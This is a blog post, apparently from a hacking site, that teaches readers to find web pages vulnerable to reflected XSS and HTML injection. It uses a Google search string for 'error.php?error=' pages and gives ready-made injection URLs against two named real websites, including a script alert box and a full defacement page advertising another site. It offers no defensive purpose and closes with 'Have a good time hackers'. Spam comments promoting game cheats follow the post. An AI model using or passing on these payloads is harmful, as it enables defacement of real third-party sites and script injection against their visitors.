Hello friends today i am going to explore you to one more web vulnerability that is famously used by many hackers these days.
as i have already explained more about xss attack on one of my previous post.
If you are a new visitor than you can easily get to know about by clicking on above link.
So lets directly jump into error.php vulnerability.
to do this lets first of open google and use this string in search box.
"inurl:error.php?error="
Now it will show you a vast search result so lets filter it to do this ignore all the extra results with diffrent url Like : error-php-error.php
pick site with url www.xyz.com/error.php?error= Only
Now Type time for checking vulnerability so consider this as
example : www.xyz.com/error.php?error=<h1>Test</h1>
or
Here is a Demo
http://www.sacareerfocus.co.za/error.php?error=<h1>Hacked</h1>
Now you ac try to add image simply by typing
http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title>
to Add a Image
http://www.sacareerfocus.co.za/error.php?error=<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyTcHZ-7uAzBGXa11JHPf4OyPsDOrAcxOlS8hnzW9GJfTor8Pp7uEzQX-4mGTaNNJRE3OejyMnqet4xChN8uNdMmUBLMBqnjtODcyPnMnqf3t4GZK5ro_b4NXdEZQPh9g0nnH2NTqBGMln/s320/security.jpg"/>
to add a Moving Message
http://www.sacareerfocus.co.za/error.php?error=<marquee>Scrolling text Here</marquee>
To Add a alert box
http://www.sacareerfocus.co.za/error.php?error=<script>alert("hello");</script>
Now Add a full deface Page
http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title><center><h1>hacked<h1><body bgcolor="red"/><p><b>You have been Hacked<br></b></p><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgn8iJfuSfUPsPdZ1jJnUOndEQAfLPSPBbolZid00guHuZfwiw06ss4wJ_X5NJIXs_B1gFtAkbDyaz7qI_H5iX3qGeoibA8dI4gLkI0Q26FNH6ZZuvAqgCL79bayymgZYfFsMt3BeSydaR0/s320/hacked.jpg"/>
<marquee><b>www.darksite.co.in</b></marquee>
you can add more html and javscript tags here,
here is another demo site :
http://www.4viprentacar.com/error.php?error=<center><h1>www.darksite.co.in</h1></center>
Have a good time hackers :)
please Leave a comment and share post thank you all again.
Hi there! I simply wish to offer you a huge thumbs up for your excellent info
ReplyDeleteyou've got right here on this post. I will be coming back to your web site for
more soon.
Also visit my websitethere aimbot
I have been browsing on-line more than three hours as of late, but I never found any fascinating article like yours.
ReplyDeleteIt is beautiful worth enough for me. Personally, if all web owners and bloggers made just right content material as you did, the internet
will probably be much more helpful than ever before.
Visit my web siteon eve cheats